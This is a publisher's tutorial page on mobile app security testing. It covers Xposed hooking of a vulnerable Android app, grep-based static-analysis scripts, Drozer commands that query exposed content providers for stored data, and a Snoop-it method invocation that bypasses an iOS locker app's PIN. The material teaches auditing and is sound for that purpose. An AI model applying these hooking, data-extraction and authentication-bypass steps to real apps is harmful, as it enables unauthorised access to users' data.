Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Free Learning
Arrow right icon

How-To Tutorials - Security

174 Articles
article-image-hacking-android-apps-using-xposed-framework
Packt
13 Jul 2016
6 min read
Save for later

Hacking Android Apps Using the Xposed Framework

Packt
13 Jul 2016
6 min read
In this article by Srinivasa Rao Kotipalli and Mohammed A. Imran, authors of Hacking Android, we will discuss Android security, which is one of the most prominent emerging topics today. Attacks on mobile devices can be categorized into various categories, such as exploiting vulnerabilities in the kernel, attacking vulnerable apps, tricking users to download and run malware and thus stealing personal data from the device, and running misconfigured services on the device. OWASP has also released the Mobile top 10 list, helping the community better understand mobile security as a whole. Although it is hard to cover a lot in a single article, let's look at an interesting topic: the the runtime manipulation of Android applications. Runtime manipulation is controlling application flow at runtime. There are multiple tools and techniques out there to perform runtime manipulation on Android. This article discusses using the Xposed framework to hook onto Android apps. (For more resources related to this topic, see here.) Let's begin! Xposed is a framework that enables developers to write custom modules for hooking onto Android apps and thus modifying their flow at runtime. It was released by rovo89 in 2012. It works by placing the app_process binary in /system/bin/ directory, replacing the original app_process binary. app_process is the binary responsible for starting the zygote process. Basically, when an Android phone is booted, init runs /system/bin/app_process and gives the resulting process the name Zygote. We can hook onto any process that is forked from the Zygote process using the Xposed framework. To demonstrate the capabilities of Xposed framework, I have developed a custom vulnerable application. The package name of the vulnerable app is com.androidpentesting.hackingandroidvulnapp1. The code in the following screenshot shows how the vulnerable application works: This code has a method, setOutput, that is called when the button is clicked. When setOutput is called, the value of i is passed to it as an argument. If you notice, the value of i is initialized to 0. Inside the setOutput function, there is a check to see whether the value of i is equal to 1. If it is, this application will display the text Cracked. But since the initialized value is 0, this app always displays the text You cant crack it. Running the application in an emulator looks like this: Now, our goal is to write an Xposed module to modify the functionality of this app at runtime and thus printing the text Cracked. First, download and install the Xposed APK file in your emulator. Xposed can be downloaded from the following link: http://dl-xda.xposed.info/modules/de.robv.android.xposed.installer_v32_de4f0d.apk Install this downloaded APK file using the following command: adb install [file name].apk Once you've installed this app, launch it, and you should see the following screen: At this stage, make sure that you have everything set up before you proceed. Once you are done with the setup, navigate to the Modules tab, where we can see all the installed Xposed modules. The following figure shows that we currently don't have any modules installed: We will now create a new module to achieve the goal of printing the text Cracked in the target application shown earlier. We use Android Studio to develop this custom module. Here is the step-by-step procedure to simplify the process: The first step is to create a new project in Android Studio by choosing the Add No Actvity option, as shown in the following screenshot. I named it XposedModule. The next step is to add the XposedBridgeAPI library so that we can use Xposed-specific methods within the module. Download the library from the following link: http://forum.xda-developers.com/attachment.php?attachmentid=2748878&d=1400342298 Create a folder called provided within the app directory and place this library inside the provided directory. Now, create a folder called assets inside the app/src/main/ directory, and create a new file called xposed_init.We will add contents to this file in a later step.After completing the first 3 steps, our project directory structure should look like this: Now, open the build.gradle file under the app folder, and add the following line under the dependencies section: provided files('provided/[file name of the Xposed   library.jar]') In my case, it looks like this: Create a new class and name it XposedClass, as shown here: After you're done creating a new class, the project structure should look as shown in the following screenshot: Now, open the xposed_init file that we created earlier, and place the following content in it. com.androidpentesting.xposedmodule.XposedClass This looks like the following screenshot: Now, let's provide some information about the module by adding the following content to AndroidManifest.xml: <meta-data android_name="xposedmodule" android_value="true" />   <meta-data android_name="xposeddescription" android_value="xposed module to bypass the validation" />     <meta-data android_name="xposedminversion" android_value="54" /> Make sure that you add this content to the application section as shown here: Finally, write the actual code within in the XposedClass to add a hook. Here is the piece of code that actually bypasses the validation being done in the target application: Here's what we have done in the previous code: Firstly, our class is implementing IXposedHookLoadPackage We wrote the method implementation for the handleLoadPackage method—this is mandatory when we implement IXposedHookLoadPackage We set up the string values for classToHook and functionToHook An if condition is written to see whether the package name equals the target package name If package name matches, execute the custom code provided inside beforeHookedMethod Within the beforeHookedMethod, we are setting the value of i to 1 and thus when this button is clicked, the value of i will be considered as 1, and the text Cracked will be displayed as a toast message Compile and run this application just like any other Android app, and then check the Modules section of Xposed application. You should see a new module with the name XposedModule, as shown here: Select the module and reboot the emulator. Once the emulator has restarted, run the target application and click on the Crack Me button. As you can see in the screenshot, we have modified the application's functionality at runtime without actually modifying its original code. We can also see the logs by tapping on the Logs section. You can observe the XposedBridge.log method in the source code shown previously. This is the method used to log the following data shown: Summary Xposed without a doubt is one of the best frameworks available out there. Understanding frameworks such as Xposed is essential to understanding Android application security. This article demonstrated the capabilities of the Xposed framework to manipulate the apps at runtime. A lot of other interesting things can be done using Xposed, such as bypassing root detection and SSL pinning. Further resources on this subject: Speeding up Gradle builds for Android [article] https://www.packtpub.com/books/content/incident-response-and-live-analysis [article] Mobile Forensics [article]
Read more
  • 0
  • 0
  • 18059

article-image-auditing-mobile-applications
Packt
08 Jul 2016
48 min read
Save for later

Auditing Mobile Applications

Packt
08 Jul 2016
48 min read
In this article by Prashant Verma and Akshay Dikshit, author of the book Mobile Device Exploitation Cookbook we will cover the following topics: Auditing Android apps using static analysis Auditing Android apps using a dynamic analyzer Using Drozer to find vulnerabilities in Android applications Auditing iOS application using static analysis Auditing iOS application using a dynamic analyzer Examining iOS App Data storage and Keychain security vulnerabilities Finding vulnerabilities in WAP-based mobile apps Finding client-side injection Insecure encryption in mobile apps Discovering data leakage sources Other application-based attacks in mobile devices Launching intent injection in Android (For more resources related to this topic, see here.) Mobile applications such as web applications may have vulnerabilities. These vulnerabilities in most cases are the result of bad programming practices or insecure coding techniques, or may be because of purposefully injected bad code. For users and organizations, it is important to know how vulnerable their applications are. Should they fix the vulnerabilities or keep/stop using the applications? To address this dilemma, mobile applications need to be audited with the goal of uncovering vulnerabilities. Mobile applications (Android, iOS, or other platforms) can be analyzed using static or dynamic techniques. Static analysis is conducted by employing certain text or string based searches across decompiled source code. Dynamic analysis is conducted at runtime and vulnerabilities are uncovered in simulated fashion. Dynamic analysis is difficult as compared to static analysis. In this article, we will employ both static and dynamic analysis to audit Android and iOS applications. We will also learn various other techniques to audit findings, including Drozer framework usage, WAP-based application audits, and typical mobile-specific vulnerability discovery. Auditing Android apps using static analysis Static analysis is the mostcommonly and easily applied analysis method in source code audits. Static by definition means something that is constant. Static analysis is conducted on the static code, that is, raw or decompiled source code or on the compiled (object) code, but the analysis is conducted without the runtime. In most cases, static analysis becomes code analysis via static string searches. A very common scenario is to figure out vulnerable or insecure code patterns and find the same in the entire application code. Getting ready For conducting static analysis of Android applications, we at least need one Android application and a static code scanner. Pick up any Android application of your choice and use any static analyzer tool of your choice. In this recipe, we use Insecure Bank, which is a vulnerable Android application for Android security enthusiasts. We will also use ScriptDroid, which is a static analysis script. Both Insecure Bank and ScriptDroid are coded by Android security researcher, Dinesh Shetty. How to do it... Perform the following steps: Download the latest version of the Insecure Bank application from GitHub. Decompress or unzip the .apk file and note the path of the unzipped application. Create a ScriptDroid.bat file by using the following code: @ECHO OFF SET /P Filelocation=Please Enter Location: mkdir %Filelocation%OUTPUT :: Code to check for presence of Comments grep -H -i -n -e "//" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_comment.txt" type -H -i "%Filelocation%*.java" |gawk "//*/,/*//" >> "%Filelocation%OUTPUTMultilineComments.txt" grep -H -i -n -v "TODO" "%Filelocation%OUTPUTTemp_comment.txt" >> "%Filelocation%OUTPUTSinglelineComments.txt" del %Filelocation%OUTPUTTemp_comment.txt :: Code to check for insecure usage of SharedPreferences grep -H -i -n -C2 -e "putString" "%Filelocation%*.java" >> "%Filelocation%OUTPUTverify_sharedpreferences.txt" grep -H -i -n -C2 -e "MODE_PRIVATE" "%Filelocation%*.java" >> "%Filelocation%OUTPUTModeprivate.txt" grep -H -i -n -C2 -e "MODE_WORLD_READABLE" "%Filelocation%*.java" >> "%Filelocation%OUTPUTWorldreadable.txt" grep -H -i -n -C2 -e "MODE_WORLD_WRITEABLE" "%Filelocation%*.java" >> "%Filelocation%OUTPUTWorldwritable.txt" grep -H -i -n -C2 -e "addPreferencesFromResource" "%Filelocation%*.java" >> "%Filelocation%OUTPUTverify_sharedpreferences.txt" :: Code to check for possible TapJacking attack grep -H -i -n -e filterTouchesWhenObscured="true" "%Filelocation%........reslayout*.xml" >> "%Filelocation%OUTPUTTemp_tapjacking.txt" grep -H -i -n -e "<Button" "%Filelocation%........reslayout*.xml" >> "%Filelocation%OUTPUTtapjackings.txt" grep -H -i -n -v filterTouchesWhenObscured="true" "%Filelocation%OUTPUTtapjackings.txt" >> "%Filelocation%OUTPUTTemp_tapjacking.txt" del %Filelocation%OUTPUTTemp_tapjacking.txt :: Code to check usage of external storage card for storing information grep -H -i -n -e "WRITE_EXTERNAL_STORAGE" "%Filelocation%........AndroidManifest.xml" >> "%Filelocation%OUTPUTSdcardStorage.txt" grep -H -i -n -e "getExternalStorageDirectory()" "%Filelocation%*.java" >> "%Filelocation%OUTPUTSdcardStorage.txt" grep -H -i -n -e "sdcard" "%Filelocation%*.java" >> "%Filelocation%OUTPUTSdcardStorage.txt" :: Code to check for possible scripting javscript injection grep -H -i -n -e "addJavascriptInterface()" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_probableXss.txt" grep -H -i -n -e "setJavaScriptEnabled(true)" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_probableXss.txt" grep -H -i -n -v "import" "%Filelocation%OUTPUTTemp_probableXss.txt" >> "%Filelocation%OUTPUTprobableXss.txt" del %Filelocation%OUTPUTTemp_probableXss.txt :: Code to check for presence of possible weak algorithms grep -H -i -n -e "MD5" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_weakencryption.txt" grep -H -i -n -e "base64" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_weakencryption.txt" grep -H -i -n -e "des" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_weakencryption.txt" grep -H -i -n -v "import" "%Filelocation%OUTPUTTemp_weakencryption.txt" >> "%Filelocation%OUTPUTWeakencryption.txt" del %Filelocation%OUTPUTTemp_weakencryption.txt :: Code to check for weak transportation medium grep -H -i -n -C3 "http://" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_overhttp.txt" grep -H -i -n -C3 -e "HttpURLConnection" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_overhttp.txt" grep -H -i -n -C3 -e "URLConnection" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_OtherUrlConnection.txt" grep -H -i -n -C3 -e "URL" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_OtherUrlConnection.txt" grep -H -i -n -e "TrustAllSSLSocket-Factory" "%Filelocation%*.java" >> "%Filelocation%OUTPUTBypassSSLvalidations.txt" grep -H -i -n -e "AllTrustSSLSocketFactory" "%Filelocation%*.java" >> "%Filelocation%OUTPUTBypassSSLvalidations.txt" grep -H -i -n -e "NonValidatingSSLSocketFactory" "%Filelocation%*.java" >> "%Filelocation%OUTPUTBypassSSLvalidations.txt" grep -H -i -n -v "import" "%Filelocation%OUTPUTTemp_OtherUrlConnection.txt" >> "%Filelocation%OUTPUTOtherUrlConnections.txt" del %Filelocation%OUTPUTTemp_OtherUrlConnection.txt grep -H -i -n -v "import" "%Filelocation%OUTPUTTemp_overhttp.txt" >> "%Filelocation%OUTPUTUnencryptedTransport.txt" del %Filelocation%OUTPUTTemp_overhttp.txt :: Code to check for Autocomplete ON grep -H -i -n -e "<Input" "%Filelocation%........reslayout*.xml" >> "%Filelocation%OUTPUTTemp_autocomp.txt" grep -H -i -n -v "textNoSuggestions" "%Filelocation%OUTPUTTemp_autocomp.txt" >> "%Filelocation%OUTPUTAutocompleteOn.txt" del %Filelocation%OUTPUTTemp_autocomp.txt :: Code to presence of possible SQL Content grep -H -i -n -e "rawQuery" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_sqlcontent.txt" grep -H -i -n -e "compileStatement" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_sqlcontent.txt" grep -H -i -n -e "db" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_sqlcontent.txt" grep -H -i -n -e "sqlite" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_sqlcontent.txt" grep -H -i -n -e "database" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_sqlcontent.txt" grep -H -i -n -e "insert" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_sqlcontent.txt" grep -H -i -n -e "delete" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_sqlcontent.txt" grep -H -i -n -e "select" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_sqlcontent.txt" grep -H -i -n -e "table" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_sqlcontent.txt" grep -H -i -n -e "cursor" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_sqlcontent.txt" grep -H -i -n -v "import" "%Filelocation%OUTPUTTemp_sqlcontent.txt" >> "%Filelocation%OUTPUTSqlcontents.txt" del %Filelocation%OUTPUTTemp_sqlcontent.txt :: Code to check for Logging mechanism grep -H -i -n -F "Log." "%Filelocation%*.java" >> "%Filelocation%OUTPUTLogging.txt" :: Code to check for Information in Toast messages grep -H -i -n -e "Toast.makeText" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_Toast.txt" grep -H -i -n -v "//" "%Filelocation%OUTPUTTemp_Toast.txt" >> "%Filelocation%OUTPUTToast_content.txt" del %Filelocation%OUTPUTTemp_Toast.txt :: Code to check for Debugging status grep -H -i -n -e "android:debuggable" "%Filelocation%*.java" >> "%Filelocation%OUTPUTDebuggingAllowed.txt" :: Code to check for presence of Device Identifiers grep -H -i -n -e "uid|user-id|imei|deviceId|deviceSerialNumber|devicePrint|X-DSN|phone |mdn|did|IMSI|uuid" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_Identifiers.txt" grep -H -i -n -v "//" "%Filelocation%OUTPUTTemp_Identifiers.txt" >> "%Filelocation%OUTPUTDevice_Identifier.txt" del %Filelocation%OUTPUTTemp_Identifiers.txt :: Code to check for presence of Location Info grep -H -i -n -e "getLastKnownLocation()|requestLocationUpdates()|getLatitude()|getLongitude() |LOCATION" "%Filelocation%*.java" >> "%Filelocation%OUTPUTLocationInfo.txt" :: Code to check for possible Intent Injection grep -H -i -n -C3 -e "Action.getIntent(" "%Filelocation%*.java" >> "%Filelocation%OUTPUTIntentValidation.txt" How it works... Go to the command prompt and navigate to the path where ScriptDroid is placed. Run the .bat file and it prompts you to input the path of the application for which you wish toperform static analysis. In our case we provide it with the path of the Insecure Bank application, precisely the path where Java files are stored. If everything worked correctly, the screen should look like the following: The script generates a folder by the name OUTPUT in the path where the Java files of the application are present. The OUTPUT folder contains multiple text files, each one corresponding to a particular vulnerability. The individual text files pinpoint the location of vulnerable code pertaining to the vulnerability under discussion. The combination ofScriptDroid and Insecure Bank gives a very nice view of various Android vulnerabilities; usually the same is not possible with live apps. Consider the following points, for instance: Weakencryption.txt has listed down the instances of Base64 encoding used for passwords in the Insecure Bank application Logging.txt contains the list of insecure log functions used in the application SdcardStorage.txt contains the code snippet pertaining to the definitions related to data storage in SD Cards Details like these from static analysis are eye-openers in letting us know of the vulnerabilities in our application, without even running the application. There's more... Thecurrent recipe used just ScriptDroid, but there are many other options available. You can either choose to write your own script or you may use one of the free orcommercial tools. A few commercial tools have pioneered the static analysis approach over the years via their dedicated focus. See also https://github.com/dineshshetty/Android-InsecureBankv2 Auditing iOS application using static analysis Auditing Android apps a using a dynamic analyzer Dynamic analysis isanother technique applied in source code audits. Dynamic analysis is conducted in runtime. The application is run or simulated and the flaws or vulnerabilities are discovered while the application is running. Dynamic analysis can be tricky, especially in the case of mobile platforms. As opposed to static analysis, there are certain requirements in dynamic analysis, such as the analyzer environment needs to be runtime or a simulation of the real runtime.Dynamic analysis can be employed to find vulnerabilities in Android applications which aredifficult to find via static analysis. A static analysis may let you know a password is going to be stored, but dynamic analysis reads the memory and reveals the password stored in runtime. Dynamic analysis can be helpful in tampering data in transmission during runtime that is, tampering with the amount in a transaction request being sent to the payment gateway. Some Android applications employ obfuscation to prevent attackers reading the code; Dynamic analysis changes the whole game in such cases, by revealing the hardcoded data being sent out in requests, which is otherwise not readable in static analysis. Getting ready For conducting dynamic analysis of Android applications, we at least need one Android application and a dynamic code analyzer tool. Pick up any Android application of your choice and use any dynamic analyzer tool of your choice. The dynamic analyzer tools can be classified under two categories: The tools which run from computers and connect to an Android device or emulator (to conduct dynamic analysis) The tools that can run on the Android device itself For this recipe, we choose a tool belonging to the latter category. How to do it... Perform the following steps for conducting dynamic analysis: Have an Android device with applications (to be analyzed dynamically) installed. Go to the Play Store and download Andrubis. Andrubis is a tool from iSecLabs which runs on Android devices and conducts static, dynamic, and URL analysis on the installed applications. We will use it for dynamic analysis only in this recipe. Open the Andrubis application on your Android device. It displays the applications installed on the Android device and analyzes these applications. How it works... Open the analysis of the application of your interest. Andrubis computes an overall malice score (out of 10) for the applications and gives the color icon in front of its main screen to reflect the vulnerable application. We selected anorange coloredapplication to make more sense with this recipe. This is how the application summary and score is shown in Andrubis: Let us navigate to the Dynamic Analysis tab and check the results: The results are interesting for this application. Notice that all the files going to be written by the application under dynamic analysis are listed down. In our case, one preferences.xml is located. Though the fact that the application is going to create a preferences file could have been found in static analysis as well, additionally, dynamic analysis confirmed that such a file is indeed created. It also confirms that the code snippet found in static analysis about the creation of a preferences file is not a dormant code but a file that is going to be created. Further, go ahead and read the created file and find any sensitive data present there. Who knows, luck may strike and give you a key to hidden treasure. Notice that the first screen has a hyperlink, View full report in browser. Tap on it and notice that the detailed dynamic analysis is presented for your further analysis. This also lets you understand what the tool tried and what response it got. This is shown in the following screenshot: There's more... The current recipe used a dynamic analyzer belonging to the latter category. There are many other tools available in the former category. Since this is an Android platform, many of them are open source tools. DroidBox can be tried for dynamic analysis. It looks for file operations (read/write), network data traffic, SMS, permissions, broadcast receivers, and so on, among other checks.Hooker is another tool that can intercept and modify API calls initiated from the application. This is veryuseful indynamic analysis. Try hooking and tampering with data in API calls. See also https://play.google.com/store/apps/details?id=org.iseclab.andrubis https://code.google.com/p/droidbox/ https://github.com/AndroidHooker/hooker Using Drozer to find vulnerabilities in Android applications Drozer is a mobile security audit and attack framework, maintained by MWR InfoSecurity. It is a must-have tool in the tester's armory. Drozer (Android installed application) interacts with other Android applications via IPC (Inter Process Communication). It allows fingerprinting of application package-related information, its attack surface, and attempts to exploit those. Drozer is an attack framework and advanced level exploits can be conducted from it. We use Drozer to find vulnerabilities in our applications. Getting ready Install Drozer by downloading it from https://www.mwrinfosecurity.com/products/drozer/ and follow the installation instructions mentioned in the user guide. Install Drozer console agent and start a session as mentioned in the User Guide. If your installation is correct, you should get Drozer command prompt (dz>). You should also have a few vulnerable applications as well to analyze. Here we chose OWASP GoatDroid application. How to do it... Every pentest starts with fingerprinting. Let us useDrozer for the same. The Drozer User Guide is very helpful for referring to the commands. The following command can be used to obtain information about anAndroid application package: run app.package.info -a <package name> We used the same to extract the information from the GoatDroid application and found the following results: Notice that apart from the general information about the application, User Permissions are also listed by Drozer. Further, let us analyze the attack surface. Drozer's attack surface lists the exposed activities, broadcast receivers, content providers, and services. The in-genuinely exposed ones may be a critical security risk and may provide you access to privileged content. Drozer has the following command to analyze the attack surface: run app.package.attacksurface <package name> We used the same to obtain the attack surface of the Herd Financial application of GoatDroid and the results can be seen in the following screenshot. Notice that one Activity and one Content Provider are exposed. We chose to attack the content provider to obtain the data stored locally. We used the followingDrozer command to analyze the content provider of the same application: run app.provider.info -a <package name> This gave us the details of the exposed content provider, which we used in another Drozer command: run scanner.provider.finduris -a <package name> We could successfully query the content providers. Lastly, we would be interested in stealing the data stored by this content provider. This is possible via another Drozer command: run app.provider.query content://<content provider details>/ The entire sequence of events is shown in the following screenshot: How it works... ADB is used to establish a connection between Drozer Python server (present on computer) and Drozer agent (.apk file installed in emulator or Android device). Drozer console is initialized to run the various commands we saw. Drozer agent utilizes theAndroid OS feature of IPC to take over the role of the target application and run the various commands as the original application. There's more... Drozer not only allows users to obtain the attack surface and steal data via content providers or launch intent injection attacks, but it is way beyond that. It can be used to fuzz the application, cause local injection attacks by providing a way to inject payloads. Drozer can also be used to run various in-built exploits and can be utilized to attack Android applications via custom-developed exploits. Further, it can also run in Infrastructure mode, allowing remote connections and remote attacks. See also Launching intent injection in Android https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf Auditing iOS application using static analysis Static analysis in source code reviews is an easier technique, and employing static string searches makes it convenient to use.Static analysis is conducted on the raw or decompiled source code or on the compiled (object) code, but the analysis is conducted outside of runtime. Usually, static analysis figures out vulnerable or insecure code patterns. Getting ready For conducting static analysis of iOS applications, we need at least one iOS application and a static code scanner. Pick up any iOS application of your choice and use any static analyzer tool of your choice. We will use iOS-ScriptDroid, which is a static analysis script, developed by Android security researcher, Dinesh Shetty. How to do it... Keep the decompressed iOS application filed and note the path of the folder containing the .m files. Create an iOS-ScriptDroid.bat file by using the following code: ECHO Running ScriptDriod ... @ECHO OFF SET /P Filelocation=Please Enter Location: :: SET Filelocation=Location of the folder containing all the .m files eg: C:sourcecodeproject iOSxyz mkdir %Filelocation%OUTPUT :: Code to check for Sensitive Information storage in Phone memory grep -H -i -n -C2 -e "NSFile" "%Filelocation%*.m" >> "%Filelocation%OUTPUTphonememory.txt" grep -H -i -n -e "writeToFile " "%Filelocation%*.m" >> "%Filelocation%OUTPUTphonememory.txt" :: Code to check for possible Buffer overflow grep -H -i -n -e "strcat(|strcpy(|strncat(|strncpy(|sprintf(|vsprintf(|gets(" "%Filelocation%*.m" >> "%Filelocation%OUTPUTBufferOverflow.txt" :: Code to check for usage of URL Schemes grep -H -i -n -C2 "openUrl|handleOpenURL" "%Filelocation%*.m" >> "%Filelocation%OUTPUTURLSchemes.txt" :: Code to check for possible scripting javscript injection grep -H -i -n -e "webview" "%Filelocation%*.m" >> "%Filelocation%OUTPUTprobableXss.txt" :: Code to check for presence of possible weak algorithms grep -H -i -n -e "MD5" "%Filelocation%*.m" >> "%Filelocation%OUTPUTtweakencryption.txt" grep -H -i -n -e "base64" "%Filelocation%*.m" >> "%Filelocation%OUTPUTtweakencryption.txt" grep -H -i -n -e "des" "%Filelocation%*.m" >> "%Filelocation%OUTPUTtweakencryption.txt" grep -H -i -n -v "//" "%Filelocation%OUTPUTtweakencryption.txt" >> "%Filelocation%OUTPUTweakencryption.txt" del %Filelocation%OUTPUTtweakencryption.txt :: Code to check for weak transportation medium grep -H -i -n -e "http://" "%Filelocation%*.m" >> "%Filelocation%OUTPUToverhttp.txt" grep -H -i -n -e "NSURL" "%Filelocation%*.m" >> "%Filelocation%OUTPUTOtherUrlConnection.txt" grep -H -i -n -e "URL" "%Filelocation%*.m" >> "%Filelocation%OUTPUTOtherUrlConnection.txt" grep -H -i -n -e "writeToUrl" "%Filelocation%*.m" >> "%Filelocation%OUTPUTOtherUrlConnection.txt" grep -H -i -n -e "NSURLConnection" "%Filelocation%*.m" >> "%Filelocation%OUTPUTOtherUrlConnection.txt" grep -H -i -n -C2 "CFStream" "%Filelocation%*.m" >> "%Filelocation%OUTPUTOtherUrlConnection.txt" grep -H -i -n -C2 "NSStreamin" "%Filelocation%*.m" >> "%Filelocation%OUTPUTOtherUrlConnection.txt" grep -H -i -n -e "setAllowsAnyHTTPSCertificate|kCFStreamSSLAllowsExpiredRoots |kCFStreamSSLAllowsExpiredCertificates" "%Filelocation%*.m" >> "%Filelocation%OUTPUTBypassSSLvalidations.txt" grep -H -i -n -e "kCFStreamSSLAllowsAnyRoot|continueWithoutCredentialForAuthenticationChallenge" "%Filelocation%*.m" >> "%Filelocation%OUTPUTBypassSSLvalidations.txt" ::to add check for "didFailWithError" :: Code to presence of possible SQL Content grep -H -i -F -e "db" "%Filelocation%*.m" >> "%Filelocation%OUTPUTsqlcontent.txt" grep -H -i -F -e "sqlite" "%Filelocation%*.m" >> "%Filelocation%OUTPUTsqlcontent.txt" grep -H -i -F -e "database" "%Filelocation%*.m" >> "%Filelocation%OUTPUTsqlcontent.txt" grep -H -i -F -e "insert" "%Filelocation%*.m" >> "%Filelocation%OUTPUTsqlcontent.txt" grep -H -i -F -e "delete" "%Filelocation%*.m" >> "%Filelocation%OUTPUTsqlcontent.txt" grep -H -i -F -e "select" "%Filelocation%*.m" >> "%Filelocation%OUTPUTsqlcontent.txt" grep -H -i -F -e "table" "%Filelocation%*.m" >> "%Filelocation%OUTPUTsqlcontent.txt" grep -H -i -F -e "cursor" "%Filelocation%*.m" >> "%Filelocation%OUTPUTsqlcontent.txt" grep -H -i -F -e "sqlite3_prepare" "%Filelocation%OUTPUTsqlcontent.txt" >> "%Filelocation%OUTPUTsqlcontent.txt" grep -H -i -F -e "sqlite3_compile" "%Filelocation%OUTPUTsqlcontent.txt" >> "%Filelocation%OUTPUTsqlcontent.txt" :: Code to check for presence of keychain usage source code grep -H -i -n -e "kSecASttr|SFHFKkey" "%Filelocation%*.m" >> "%Filelocation%OUTPUTLocationInfo.txt" :: Code to check for Logging mechanism grep -H -i -n -F "NSLog" "%Filelocation%*.m" >> "%Filelocation%OUTPUTLogging.txt" grep -H -i -n -F "XLog" "%Filelocation%*.m" >> "%Filelocation%OUTPUTLogging.txt" grep -H -i -n -F "ZNLog" "%Filelocation%*.m" >> "%Filelocation%OUTPUTLogging.txt" :: Code to check for presence of password in source code grep -H -i -n -e "password|pwd" "%Filelocation%*.m" >> "%Filelocation%OUTPUTpassword.txt" :: Code to check for Debugging status grep -H -i -n -e "#ifdef DEBUG" "%Filelocation%*.m" >> "%Filelocation%OUTPUTDebuggingAllowed.txt" :: Code to check for presence of Device Identifiers ===need to work more on this grep -H -i -n -e "uid|user-id|imei|deviceId|deviceSerialNumber|devicePrint|X-DSN|phone |mdn|did|IMSI|uuid" "%Filelocation%*.m" >> "%Filelocation%OUTPUTTemp_Identifiers.txt" grep -H -i -n -v "//" "%Filelocation%OUTPUTTemp_Identifiers.txt" >> "%Filelocation%OUTPUTDevice_Identifier.txt" del %Filelocation%OUTPUTTemp_Identifiers.txt :: Code to check for presence of Location Info grep -H -i -n -e "CLLocationManager|startUpdatingLocation|locationManager|didUpdateToLocation |CLLocationDegrees|CLLocation|CLLocationDistance|startMonitoringSignificantLocationChanges" "%Filelocation%*.m" >> "%Filelocation%OUTPUTLocationInfo.txt" :: Code to check for presence of Comments grep -H -i -n -e "//" "%Filelocation%*.m" >> "%Filelocation%OUTPUTTemp_comment.txt" type -H -i "%Filelocation%*.m" |gawk "//*/,/*//" >> "%Filelocation%OUTPUTMultilineComments.txt" grep -H -i -n -v "TODO" "%Filelocation%OUTPUTTemp_comment.txt" >> "%Filelocation%OUTPUTSinglelineComments.txt" del %Filelocation%OUTPUTTemp_comment.txt How it works... Go to the command prompt and navigate to the path where iOS-ScriptDroid is placed. Run the batch file and it prompts you to input the path of the application for which you wish to perform static analysis. In our case, we arbitrarily chose an application and inputted the path of the implementation (.m) files. The script generates a folder by the name OUTPUT in the path where the .m files of the application are present. The OUTPUT folder contains multiple text files, each one corresponding to a particular vulnerability. The individual text files pinpoint the location of vulnerable code pertaining to the vulnerability under discussion. The iOS-ScriptDroid gives first hand info of various iOS applications vulnerabilities present in the current applications. For instance, here are a few of them which are specific to the iOS platform. BufferOverflow.txt contains the usage of harmful functions when missing buffer limits such as strcat, strcpy, and so on are found in the application. URL Schemes, if implemented in an insecure manner, may result in access related vulnerabilities. Usage of URL schemes is listed in URLSchemes.txt. These are sefuuseful vulnerabilitydetails to know iniOS applications via static analysis. There's more... The current recipe used just iOS-ScriptDroid but there are many other options available. You can either choose to write your own script or you may use one of the free or commercial tools available. A few commercial tools have pioneered the static analysis approach over the years via their dedicated focus. See also Auditing Android apps using static analysis Auditing iOS application using a dynamic analyzer Dynamic analysis is theruntime analysis of the application. The application is run or simulated to discover the flaws during runtime. Dynamic analysis can be tricky, especially in the case of mobile platforms. Dynamic analysis is helpful in tampering data in transmission during runtime, for example, tampering with the amount in a transaction request being sent to a payment gateway. In applications that use custom encryption to prevent attackers reading the data, dynamic analysis is useful in revealing the encrypted data, which can be reverse-engineered. Note that since iOS applications cannot be decompiled to the full extent, dynamic analysis becomes even more important in finding the sensitive data which could have been hardcoded. Getting ready For conducting dynamic analysis of iOS applications, we need at least one iOS application and a dynamic code analyzer tool. Pick up any iOS application of your choice and use any dynamic analyzer tool of your choice. In this recipe, let us use the open source tool Snoop-it. We will use an iOS app that locks files which can only be opened using PIN, pattern, and a secret question and answer to unlock and view the file. Let us see if we can analyze this app and find a security flaw in it using Snoop-it. Please note that Snoop-it only works on jailbroken devices. To install Snoop-it on your iDevice, visit https://code.google.com/p/snoop-it/wiki/GettingStarted?tm=6. We have downloaded Locker Lite from the App Store onto our device, for analysis. How to do it... Perform the following steps to conductdynamic analysis oniOS applications: Open the Snoop-it app by tapping on its icon. Navigate to Settings. Here you will see the URL through which the interface can be accessed from your machine: Please note the URL, for we will be using it soon. We have disabled authentication for our ease. Now, on the iDevice, tap on Applications | Select App Store Apps and select the Locker app: Press the home button, and open the Locker app. Note that on entering the wrong PIN, we do not get further access: Making sure the workstation and iDevice are on the same network, open the previously noted URL in any browser. This is how the interface will look: Click on the Objective-C Classes link under Analysis in the left-hand panel: Now, click on SM_LoginManagerController. Class information gets loaded in the panel to the right of it. Navigate down until you see -(void) unlockWasSuccessful and click on the radio button preceding it: This method has now been selected. Next, click on the Setup and invoke button on the top-right of the panel. In the window that appears, click on the Invoke Method button at the bottom: As soon as we click on thebutton, we notice that the authentication has been bypassed, and we can view ourlocked file successfully. How it works... Snoop-it loads all classes that are in the app, and indicates the 